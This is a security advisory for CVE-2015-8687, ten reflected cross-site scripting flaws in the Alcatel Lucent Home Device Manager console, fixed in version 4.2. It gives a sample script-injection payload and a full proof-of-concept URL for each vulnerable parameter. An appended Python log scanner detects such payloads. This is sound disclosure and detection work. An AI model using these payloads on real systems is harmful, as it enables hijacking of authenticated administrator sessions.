
Alcatel Lucent Home Device Manager Cross Site Scripting

05 Jan 2016 00:00:00 | Reported by Ugur Cihan KOC | Type: packetstorm | Source: packetstormsecurity.com

Ten reflected XSS vulnerabilities were discovered in the Alcatel Lucent Home Device Manager Management Console 4.1.10.5. The severity level is rated high, the exploitation technique is local and authenticated, and the issues are fixed in version 4.2.

Related

CNVD: Alcatel-Lucent Home Device Manager Cross-Site Scripting Vulnerability (16 Jan 2016 00:00)

CVE: CVE-2015-8687 (23 Mar 2017 20:00)

Cvelist: CVE-2015-8687 (23 Mar 2017 20:00)

EUVD: EUVD-2015-8564 (7 Oct 2025 00:30)

NVD: CVE-2015-8687 (23 Mar 2017 20:59)

Prion: Cross site scripting (23 Mar 2017 20:59)

`Document Title:  
===============  
Alcatel Lucent Home Device Manager - Management Console Multiple XSS  
  
CVE-Number:  
===========  
CVE-2015-8687  
  
Release Date:  
=============  
03 Jan 2016  
  
Abstract Advisory Information:  
=============================  
Ugur Cihan Koc discovered ten reflected XSS  
vulnerabilities in Alcatel Lucent Home Device Manager - Management Console  
  
Vulnerability Disclosure Timeline:  
==================================  
10 Dec 2015 Bug reported to the vendor.  
10 Dec 2015 Vendor responded; investigating  
16 Dec 2015 Vendor validated and fixed the issues  
27 Dec 2015 CVE number assigned  
03 Jan 2016 Disclosed  
  
Affected Product(s):  
====================  
Alcatel Lucent Home Device Manager - Management Console 4.1.10.5  
Older versions may also be affected  
  
Exploitation Technique:  
=======================  
Local, Authenticated  
  
Severity Level:  
===============  
High  
  
Technical Details & Description:  
================================  
- Sample Payload: 42f8b36<script>alert(1)<%2fscript>152b4  
  
- Affected Path/Parameter: [10 parameters]  
  
1. /hdm/DeviceType/getDeviceType.do [deviceTypeID parameter]  
   o http://10.240.71.198:7003/hdm/DeviceType/getDeviceType.do?deviceTypeID=42f8b36<script>alert(1)<%2fscript>152b4  
  
2. /hdm/PolicyAction/findPolicyActions.do [policyActionClass parameter]  
   o http://10.240.71.198:7003/hdm/PolicyAction/findPolicyActions.do?policyActionSearch=1&policyActionName=&policyActionClass=c9e31"><script>alert(1)<%2fscript>3bd174ff207&policyActionFunction=0  
  
3. /hdm/PolicyAction/findPolicyActions.do [policyActionName parameter]  
   o http://10.240.71.198:7003/hdm/PolicyAction/findPolicyActions.do?policyActionSearch=1&policyActionName=553a3"><script>alert(1)<%2fscript>721d335792b&policyActionClass=&policyActionFunction=0  
  
4. /hdm/SingleDeviceMgmt/getDevice.do [deviceID parameter]  
   o http://10.240.71.198:7003/hdm/SingleDeviceMgmt/getDevice.do?deviceID=8001a1a0b<script>alert(1)<%2fscript>1a032  
  
5. /hdm/ajax.do [operation parameter]  
   o http://10.240.71.198:7003/hdm/ajax.do?operation=getDeviceById0fa81<script>alert(1)<%2fscript>238957ca4e0&deviceId=8001  
  
6. /hdm/device/editDevice.do [deviceID parameter]  
   o http://10.240.71.198:7003/hdm/device/editDevice.do?deviceID=8001c94e5<script>alert(1)<%2fscript>45f4a  
  
7. /hdm/policy/findPolicies.do [policyAction parameter]  
   o http://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1&policyName=&policyAction=19f01"><script>alert(1)<%2fscript>b37ee8333eb&policyClass=&policyStatus=&trigger=trigger_all  
  
8. /hdm/policy/findPolicies.do [policyClass parameter]  
   o http://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1&policyName=&policyAction=&policyClass=c77cb"><script>alert(1)<%2fscript>5ddc63ced2e&policyStatus=&trigger=trigger_all  
  
9. /hdm/policy/findPolicies.do [policyName parameter]  
   o http://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1&policyName=654dd"><script>alert(1)<%2fscript>5b8329ee237&policyAction=&policyClass=&policyStatus=&trigger=trigger_all  
  
10. /hdm/xmlHttp.do [operation parameter]  
   o http://10.240.71.198:7003/hdm/xmlHttp.do?operation=getQueuedActionsd4b0c<script>alert(1)<%2fscript>217f045ae1f&deviceID=8001  
  
  
  
Proof of Concept (PoC):  
=======================  
PoC video:  
https://drive.google.com/file/d/0B-LWHbwdK3P9Y3UyZnFmZjJqa1U/view?usp=sharing  
  
Solution Fix & Patch:  
====================  
Fixed in version 4.2  
  
Security Risk:  
==============  
The risk of the vulnerabilities above is estimated as high.  
  
Credits & Authors:  
==================  
Ugur Cihan Koc(@_uceka_)  
Blog: www.uceka.com  
  
  
`
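
A log-review check for the ten path/parameter pairs listed in the advisory, added here as an example and not part of the original advisory or the vendor's code: it percent-decodes each affected parameter and flags values containing `<`, `>` or `"`. The access-log layout, the function names and the sample lines are constructed assumptions.

```python
# Added example: flag requests whose affected HDM parameter carries HTML markup.
import re
from urllib.parse import urlsplit, parse_qsl

# Path -> parameters the advisory lists as reflected into the response.
AFFECTED = {
    "/hdm/DeviceType/getDeviceType.do": {"deviceTypeID"},
    "/hdm/PolicyAction/findPolicyActions.do": {"policyActionClass", "policyActionName"},
    "/hdm/SingleDeviceMgmt/getDevice.do": {"deviceID"},
    "/hdm/ajax.do": {"operation"},
    "/hdm/device/editDevice.do": {"deviceID"},
    "/hdm/policy/findPolicies.do": {"policyAction", "policyClass", "policyName"},
    "/hdm/xmlHttp.do": {"operation"},
}
# Characters that let a reflected value break out of text or a quoted attribute.
MARKUP = re.compile(r'[<>"]')
# Assumed log layout: common/combined format with the request line in quotes.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return sorted (path, param) pairs where an affected parameter holds markup."""
    parts = urlsplit(target)
    wanted = AFFECTED.get(parts.path, set())
    hits = set()
    # parse_qsl percent-decodes values, so %3Cscript%3E is caught as well.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in wanted and MARKUP.search(value):
            hits.add((parts.path, name))
    return sorted(hits)

def scan(lines):
    """Yield (line_number, hits) for log lines that trip the check."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        hits = suspicious_params(match.group(1)) if match else []
        if hits:
            yield number, hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - admin [05/Jan/2016:10:00:00 +0000] "GET /hdm/device/editDevice.do?deviceID=8001 HTTP/1.1" 200 5120',
    '192.0.2.11 - admin [05/Jan/2016:10:00:05 +0000] "GET /hdm/device/editDevice.do?deviceID=8001%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 5170',
    '192.0.2.11 - admin [05/Jan/2016:10:00:09 +0000] "GET /hdm/policy/findPolicies.do?policySearch=1&policyName=a%22%3E%3Cb%3E&policyAction= HTTP/1.1" 200 901',
    '192.0.2.12 - admin [05/Jan/2016:10:00:12 +0000] "GET /hdm/ajax.do?operation=getDeviceById&deviceId=8001 HTTP/1.1" 200 310',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(number, hits)
```

A hit shows that markup was sent to an affected parameter, not that it executed; on version 4.2 and later the same request should come back with the value encoded.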
